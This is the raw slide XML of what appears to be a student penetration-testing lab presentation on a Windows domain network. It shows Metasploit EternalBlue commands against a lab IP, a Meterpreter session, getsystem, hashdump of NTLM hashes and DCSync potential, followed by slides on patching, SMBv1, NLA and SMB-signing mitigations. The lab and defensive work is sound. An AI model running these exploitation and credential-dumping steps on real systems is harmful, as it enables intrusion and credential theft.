            <a:ext cx="6657953" cy="3461658"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1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Exploit #1 — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="14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EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1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(MS17-010):</a:t>
            </a:r>
          </a:p>
          <a:p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use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1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smb</a:t>
            </a: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/ms17_010_psexec</a:t>
            </a:r>
          </a:p>
          <a:p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set RHOSTS 192.168.1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1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→ Meterpreter session 1 opened (S-DC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1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Exploit #2 — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="14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BlueKeep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1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/ RDP (CVE-2019-0708):</a:t>
            </a:r>
          </a:p>
          <a:p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Confirmed RDP exposure without NLA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Content Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EC2168E-98B6-948F-9378-A3CD441FCDC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48428" y="143777"/>
            <a:ext cx="4001315" cy="2250739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2EBD1391-5D14-C2A5-A9E6-C1017E06F76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51390" y="4463485"/>
            <a:ext cx="2998353" cy="1686573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811CBAFA-D7E0-40A7-BB94-2C05304B40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DA7765E-1282-EEA5-FF86-0078093E6F55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3993760" y="3029462"/>
            <a:ext cx="4715525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Privilege Escalation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> → NT AUTHORITY\SYSTEM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Credential Extraction:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> → NTLM password hashes retrieved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Lateral Movement:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> attack potential confirmed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16453845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F5FBA99-5BCC-791A-2C80-BFFD53364C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Security measures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94CB01-5B24-878C-474F-66C82B9EE2C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endParaRPr lang="en-GB" sz="800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFDD77"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB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74A9471-F592-BC92-CDC7-DFFF6B66CD77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318352" y="2057400"/>
            <a:ext cx="3432748" cy="414853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M1 | HIGH — SMBv1 = no more attack surface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>—Patch &amp; SMBv1 S-DC + ClientS1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Used Windows Update to install the MS17-010 fix (KB4012212)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Set-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>SmbServerConfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t> -EnableSMB1Protocol $false to turn off SMBv1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Confirmed: Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>SmbServerConfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t> → EnableSMB1Protocol = False → Turning off SMBv1 completely resolves CVE-2017-0144 (CVSS 9.3).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49B713A-6E82-DD60-864E-CD9ED4CF01BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3893226" y="2057400"/>
            <a:ext cx="3687580" cy="397846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M2 | HIGH — NLA stops RDP access from those who aren't logged in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>BlueKeep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>: RDP and NLA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>S-DC and ClientS1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Used Windows Update to install CVE-2019-0708 fixes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Group Policy: All RDP sessions must use NLA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Windows Defender Firewall: Only allow RDP from management IPs. NLA requires authentication before a session is formed, which stops unauthenticated RCE (CVSS 9.8).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0332D93-AEAF-AE04-EA6F-327475897E95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7854846" y="2057400"/>
            <a:ext cx="3687580" cy="397846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M3 | MEDIUM—Signing stops relay and MITM attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>NTLM Relay and SMB Signing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Across the domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Group Policy: MS Network Client: Always disable NTLM v1 authentication for the whole domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Confirmed: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t> --script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>-security-mode -p 445 → needed → SMB signing makes relay attacks possible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417815839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113B3F-FA88-484B-B9B3-7614DF7CD0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Security measures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DE9F877-2F82-0FD8-AEAC-09FD1760E44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82" y="1964829"/>
            <a:ext cx="3627620" cy="2039872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2A128113-F765-BF08-66BC-DD40895D338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47343" y="1964830"/>
            <a:ext cx="3777523" cy="2122608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D33968E9-6ECB-D705-E9AD-1F104338D8E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64707" y="0"/>
            <a:ext cx="3627618" cy="2038376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475E2A09-E5DB-6727-4DC3-2FC9EE9D45E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9899" y="4087438"/>
            <a:ext cx="3777523" cy="2122608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93BFCA8F-18BD-A63D-52C3-2BB4BDEA1E0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5376" y="4150471"/>
            <a:ext cx="3804454" cy="2059575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B745F004-A068-7D07-A055-D3719FAACC8A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71927" y="3959400"/>
            <a:ext cx="3970174" cy="22506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0449556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VTI">
  <a:themeElements>
    <a:clrScheme name="Retrospect">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="344068"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="D9E0E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="1CADE4"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="2683C6"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="28C4CC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127</TotalTime>
  <Words>666</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>139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Aptos</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>RetrospectVTI</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Security Platform setup (Kali Linux) </vt:lpstr>
      <vt:lpstr>Continue Kali Set up </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Network Recconnaisance- Informations</vt:lpstr>
      <vt:lpstr> Vulnerability Assessment — SWANSEA.ACCA Network </vt:lpstr>
      <vt:lpstr>Continue Vulnerability</vt:lpstr>
      <vt:lpstr>Exploitation highlights</vt:lpstr>
      <vt:lpstr>Security measures </vt:lpstr>
      <vt:lpstr>Security measures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Alexandra Gabriela Craciun (2323954)</dc:creator>
  <cp:lastModifiedBy>Alexandra Craciun</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-16T08:44:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-17T08:55:28Z</dcterms:modified>
</cp:coreProperties>
</file>